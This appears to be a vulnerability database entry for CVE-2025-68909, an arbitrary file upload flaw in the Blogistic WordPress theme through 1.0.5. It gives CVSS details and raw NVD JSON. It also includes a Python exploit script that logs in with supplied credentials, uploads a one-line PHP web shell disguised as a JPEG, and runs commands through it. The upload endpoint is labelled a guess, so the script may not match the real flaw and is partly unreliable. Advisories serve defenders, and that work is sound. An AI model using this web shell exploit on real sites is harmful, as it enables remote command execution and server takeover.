Security Vulnerability Report
中文
CVE-2025-68909 CVSS 9.9 CRITICAL

CVE-2025-68909

Published: 2026-01-22 17:16:15
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogistic blogistic allows Using Malicious Files.This issue affects Blogistic: from n/a through <= 1.0.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Blogistic Theme <= 1.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-68909 PoC - Blogistic WordPress Theme Arbitrary File Upload # This PoC demonstrates uploading a PHP web shell to a vulnerable Blogistic theme import requests import sys def upload_webshell(target_url, wp_admin_user, wp_admin_pass): """ Upload a PHP webshell to vulnerable Blogistic theme """ # Login to WordPress admin login_url = f"{target_url}/wp-login.php" session = requests.Session() login_data = { 'log': wp_admin_user, 'pwd': wp_admin_pass, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print("[*] Logging into WordPress admin...") response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed!") return False print("[+] Login successful!") # Prepare malicious PHP file webshell_content = "<?php system($_GET['cmd']); ?>" # Upload endpoint - typically in theme's includes or upload handler upload_url = f"{target_url}/wp-content/themes/blogistic/includes/upload-handler.php" files = { 'file': ('shell.php', webshell_content, 'image/jpeg') } print("[*] Uploading malicious PHP file...") try: response = session.post(upload_url, files=files, timeout=10) # Check if upload was successful if response.status_code == 200: print("[+] File uploaded successfully!") # Try to locate the uploaded file uploaded_url = f"{target_url}/wp-content/uploads/shell.php" verify = requests.get(uploaded_url, params={'cmd': 'whoami'}) if verify.status_code == 200: print(f"[+] Webshell uploaded at: {uploaded_url}") print(f"[+] Example command: {uploaded_url}?cmd=whoami") return True except Exception as e: print(f"[-] Upload failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python3 {sys.argv[0]} <target_url> <admin_user> <admin_pass>") print(f"Example: python3 {sys.argv[0]} http://target.com admin password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] password = sys.argv[3] upload_webshell(target, user, password)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68909", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:14.847", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogistic blogistic allows Using Malicious Files.This issue affects Blogistic: from n/a through <= 1.0.5."}, {"lang": "es", "value": "Una vulnerabilidad de carga sin restricciones de archivos de tipo peligroso en blazethemes Blogistic blogistic permite el uso de archivos maliciosos. Este problema afecta a Blogistic: desde n/a hasta &lt;= 1.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/blogistic/vulnerability/wordpress-blogistic-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}